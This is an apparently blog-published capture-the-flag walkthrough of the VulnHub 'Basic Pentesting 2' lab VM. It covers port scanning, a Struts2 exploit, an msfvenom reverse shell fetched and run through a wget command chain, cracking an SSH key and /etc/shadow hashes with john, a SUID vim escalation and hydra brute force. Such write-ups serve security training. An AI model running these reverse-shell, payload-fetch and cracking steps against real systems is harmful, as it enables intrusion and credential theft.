VM : BasicPentesting2
Dwonload Link : https://www.vulnhub.com/entry/basic-pentesting-2,241/
Start the VM and get IP of VM :
Scanning the target :
There is nothing special on the web page.
Now lets scan the web server for some hidden urls, directories or path, with dirb.
There are two text file :
dev.txt
Download exploit from here : https://www.exploit-db.com/exploits/42627
Start an HTTP Server on port 1234, i am using php interpreter
Getting Reverse Shell on target Server :
Generating reverse shell payload with msfvenom
Target url :
Starting a tty shell with python pty library
Privilege Escalation :
Dwonload Link : https://www.vulnhub.com/entry/basic-pentesting-2,241/
Start the VM and get IP of VM :
$ nmap -sP 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.000088s latency).
Nmap scan report for 192.168.56.100
Host is up (0.00017s latency).
Nmap scan report for 192.168.56.103
Host is up (0.00024s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 17.09 seconds
Scanning the target :
$ nmap -sV 192.168.56.103 -oN nmap.scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-12 18:03 UTC
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds
- OpenSSH 7.2p2
- Web Server on port 80
- Also tomcat server is running on port 8080
There is nothing special on the web page.
Now lets scan the web server for some hidden urls, directories or path, with dirb.
$ dirb http://192.168.56.103/ -o dirb.scan
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb.scan
START_TIME: Sun Jan 12 18:17:14 2020
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.103/ ----
==> DIRECTORY: http://192.168.56.103/development/
+ http://192.168.56.103/index.html (CODE:200|SIZE:158)
+ http://192.168.56.103/server-status (CODE:403|SIZE:302)
---- Entering directory: http://192.168.56.103/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Jan 12 18:17:15 2020
DOWNLOADED: 4612 - FOUND: 2
There are two text file :
dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Download exploit from here : https://www.exploit-db.com/exploits/42627
Start an HTTP Server on port 1234, i am using php interpreter
php -S 192.168.56.1:1234
PHP 7.2.24-0ubuntu0.18.04.1 Development Server started at Fri Dec 27 18:31:57 2019
Listening on http://192.168.56.1:1234
Document root is /home/ajay
Press Ctrl-C to quit.
$ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 "wget http://192.168.56.1:1234/Vulnerable"
Getting Reverse Shell on target Server :
Generating reverse shell payload with msfvenom
$ msfvenom -p linux/x64/shell_reverse_tcp -f elf LHOST=192.168.56.1 LPORT=1234 -o rev_shell
$ nc -lvvp 1234
http://192.168.56.1/rev_shell
Target url :
http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3
http://192.168.56.1/rev_shell
cd /tmp/;wget http://192.168.56.1/rev_shell;chmod +x rev_shell;./rev_shell
$ python3 exploit.py http://192.168.56.103:8080/struts2-rest-showcase-2.5.12/orders/3 "cd /tmp/;wget http://192.168.56.1:8080/rev_shell;chmod +x rev_shell;./rev_shell"
Starting a tty shell with python pty library
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation :
Lets try to go to /home/ directory, so we can look at number of users on the system.
tomcat9@basic2:/home$ ls
jan kay
There are two users "jan" and "kay". Lets check the jan's folder first
Some other Methods to crack the user accounts :
tomcat9@basic2:/home$ cd jan
tomcat9@basic2:/home/jan$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 29 16:55 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
-rw------- 1 root jan 602 Nov 29 16:55 .viminfo
$ ls -al
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 937 Jan 13 23:52 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Nov 29 17:05 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
$ ls
authorized_keys id_rsa id_rsa.pub
$ python ssh2john.py id_rsa > rsa_key.dat
$ john rsa_key.dat
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:44 3/3 0g/s 3137Kp/s 3137Kc/s 3137KC/s nl1nt..nl1sj
0g 0:00:00:46 3/3 0g/s 3178Kp/s 3178Kc/s 3178KC/s mdgblk..mdgbjn
0g 0:00:01:03 3/3 0g/s 3409Kp/s 3409Kc/s 3409KC/s rymagns..rymagls
0g 0:00:01:04 3/3 0g/s 3420Kp/s 3420Kc/s 3420KC/s 3gsimg..3gsigs
0g 0:00:01:08 3/3 0g/s 3461Kp/s 3461Kc/s 3461KC/s ff68br3..ff68bck
beeswax (id_rsa_key)
$ ssh -i id_rsa kay@localhost
Could not create directory '/home/tomcat9/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/home/tomcat9/.ssh/known_hosts).
Enter passphrase for key 'id_rsa': beeswax
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Jan 13 23:44:21 2020 from ::1
kay@basic2:~$
$ ls
pass.bak
$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
$ sudo -i
[sudo] password for kay: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
root@basic2:~#
$ ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!
If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.
Happy hacking!
root@basic2:~#
Some other Methods to crack the user accounts :
However theres also some other method to get the root shell on the machine.
Finding SUID root Binaries :
Lets try to find the binary executables with SUID root.
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 85832 Nov 30 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 428240 Jan 18 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 2437320 Nov 24 2016 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Nov 30 2017 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Nov 30 2017 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
As we can see vim is also has SUID root, means we can open/edit root privileged files with vim. So we are now going to crack user passwords from /etc/shadow file.
With vim we can open /etc/shadow file can then try to crack the password for users with john.
There are some parts of it missing, so we write the buffer in new file at /home/code.hash file with command mode on vim by command :w /home/code.hash. Now we are interested in cracking only two accounts
As we can see jan is also listed on sudoer list
Enumeration with enum4linux :
Enum4linux is a tool for enumerating information from windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.
Bruteforcing ssh
We can get the usernames, now we can bruteforce the ssh passwords with above usernames with hydra.
For more writeups visit : http://www.sec-art.net/p/ctf.html
With vim we can open /etc/shadow file can then try to crack the password for users with john.
$ vim /etc/shadow
There are some parts of it missing, so we write the buffer in new file at /home/code.hash file with command mode on vim by command :w /home/code.hash. Now we are interested in cracking only two accounts
kay:$6$ON8Wi9Ow$Puwzhgbc2chaNEqWFO/UVH2yJ5zVb3WirwtCxQ5ssr2OEMAuYCrHscUNe.KPUhH6ND4CYx9WWu449W3mrzVtk/:17644:0:99999:7:::
jan:$6$Bbz6m7oU$WjYF4ZiF/QuPuiNAzl7bthT8LvIWikymEtX6tZ0WplHQUmMezufOCrKQRdxqbP8j03.x.pXv04xDgexxwbIIG0:17640:0:99999:7:::
$ john shadow.dat
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
armando (jan)
$ su - jan
Password: armando
jan@basic2:~$
jan ALL=(ALL:ALL) ALL
$ vim /etc/sudoers
As we can see jan is also listed on sudoer list
$ sudo -l
[sudo] password for jan: armando
Matching Defaults entries for jan on basic2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jan may run the following commands on basic2:
(ALL : ALL) ALL
$ sudo su -
root@basic2:~# ls
ls
flag.txt
root@basic2:~#
Enumeration with enum4linux :
Enum4linux is a tool for enumerating information from windows and Samba systems. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.
$ enum4linux 192.168.56.103
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
Bruteforcing ssh
We can get the usernames, now we can bruteforce the ssh passwords with above usernames with hydra.
$ hydra -l jan -P rockyou.txt 192.168.56.103 -t 10 ssh -o success
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-01-14 07:21:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344289 to do in 2173:23h, 10 active
[STATUS] 86.67 tries/min, 260 tries in 00:03h, 14344139 to do in 2758:30h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343889 to do in 3281:17h, 10 active
[22][ssh] host: 192.168.56.103 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-01-14 07:32:10
$ ssh jan@192.168.56.103
jan@192.168.56.103's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Nov 29 16:53:56 2019 from 192.168.56.1
jan@basic2:~$
For more writeups visit : http://www.sec-art.net/p/ctf.html